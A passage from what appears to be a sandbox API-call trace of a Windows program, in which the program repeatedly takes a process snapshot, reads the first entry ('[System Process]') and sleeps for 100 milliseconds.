dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.951] Sleep (dwMilliseconds=0x64) [0239.993] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0240.007] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.235] Sleep (dwMilliseconds=0x64) [0240.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0240.283] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.417] Sleep (dwMilliseconds=0x64) [0240.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0240.509] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.680] Sleep (dwMilliseconds=0x64) [0240.754] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0240.774] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.949] Sleep (dwMilliseconds=0x64) [0240.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0241.041] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.257] Sleep (dwMilliseconds=0x64) [0241.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0241.320] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.462] Sleep (dwMilliseconds=0x64) [0241.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0241.479] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.556] Sleep (dwMilliseconds=0x64) [0241.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0241.574] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.650] Sleep (dwMilliseconds=0x64) [0241.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0241.668] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.742] Sleep (dwMilliseconds=0x64) [0241.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0241.761] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.993] Sleep (dwMilliseconds=0x64) [0242.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0242.046] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.197] Sleep (dwMilliseconds=0x64) [0242.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0242.260] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.396] Sleep (dwMilliseconds=0x64) [0242.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0242.414] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.532] Sleep (dwMilliseconds=0x64) [0242.547] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0242.594] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.832] Sleep (dwMilliseconds=0x64) [0242.850] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0242.861] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.981] Sleep (dwMilliseconds=0x64) [0243.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0243.134] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.288] Sleep (dwMilliseconds=0x64) [0243.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0243.348] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.501] Sleep (dwMilliseconds=0x64) [0243.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0243.562] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.848] Sleep (dwMilliseconds=0x64) [0243.901] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0243.912] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.071] Sleep (dwMilliseconds=0x64) [0244.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0244.156] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.400] Sleep (dwMilliseconds=0x64) [0244.440] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d9c [0244.454] Process32First (in: hSnapshot=0x1d9c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.664] Sleep (dwMilliseconds=0x64) [0244.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0244.752] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.927] Sleep (dwMilliseconds=0x64) [0244.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0244.981] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.145] Sleep (dwMilliseconds=0x64) [0245.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0245.238] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.385] Sleep (dwMilliseconds=0x64) [0245.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0245.475] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.625] Sleep (dwMilliseconds=0x64) [0245.663] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0245.675] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.828] Sleep (dwMilliseconds=0x64) [0245.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0245.930] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.092] Sleep (dwMilliseconds=0x64) [0246.134] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0246.155] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.357] Sleep (dwMilliseconds=0x64) [0246.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0246.444] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.701] Sleep (dwMilliseconds=0x64) [0246.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0246.749] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.906] Sleep (dwMilliseconds=0x64) [0246.943] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0246.955] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.101] Sleep (dwMilliseconds=0x64) [0247.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0247.194] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.367] Sleep (dwMilliseconds=0x64) [0247.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0247.416] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.558] Sleep (dwMilliseconds=0x64) [0247.595] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0247.606] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.788] Sleep (dwMilliseconds=0x64) [0247.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0247.838] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.970] Sleep (dwMilliseconds=0x64) [0247.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0247.984] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.110] Sleep (dwMilliseconds=0x64) [0248.161] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0248.238] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.424] Sleep (dwMilliseconds=0x64) [0248.477] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0248.489] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.636] Sleep (dwMilliseconds=0x64) [0248.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0248.691] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.844] Sleep (dwMilliseconds=0x64) [0248.884] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0248.931] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.123] Sleep (dwMilliseconds=0x64) [0249.160] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0249.171] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.365] Sleep (dwMilliseconds=0x64) [0249.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0249.423] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.571] Sleep (dwMilliseconds=0x64) [0249.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0249.665] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.822] Sleep (dwMilliseconds=0x64) [0249.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0249.869] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.030] Sleep (dwMilliseconds=0x64) [0250.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0250.079] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.289] Sleep (dwMilliseconds=0x64) [0250.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0250.385] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.530] Sleep (dwMilliseconds=0x64) [0250.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0250.578] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.721] Sleep (dwMilliseconds=0x64) [0250.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0250.777] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.970] Sleep (dwMilliseconds=0x64) [0251.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0251.071] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.236] Sleep (dwMilliseconds=0x64) [0251.275] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0251.290] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.520] Sleep (dwMilliseconds=0x64) [0251.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0251.615] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.762] Sleep (dwMilliseconds=0x64) [0251.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0251.821] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.981] Sleep (dwMilliseconds=0x64) [0252.041] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0252.057] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.240] Sleep (dwMilliseconds=0x64) [0252.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0252.352] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.561] Sleep (dwMilliseconds=0x64) [0252.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0252.638] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.784] Sleep (dwMilliseconds=0x64) [0252.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0252.881] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.026] Sleep (dwMilliseconds=0x64) [0253.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0253.084] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.252] Sleep (dwMilliseconds=0x64) [0253.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0253.305] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.459] Sleep (dwMilliseconds=0x64) [0253.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0253.547] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.762] Sleep (dwMilliseconds=0x64) [0253.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0253.821] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 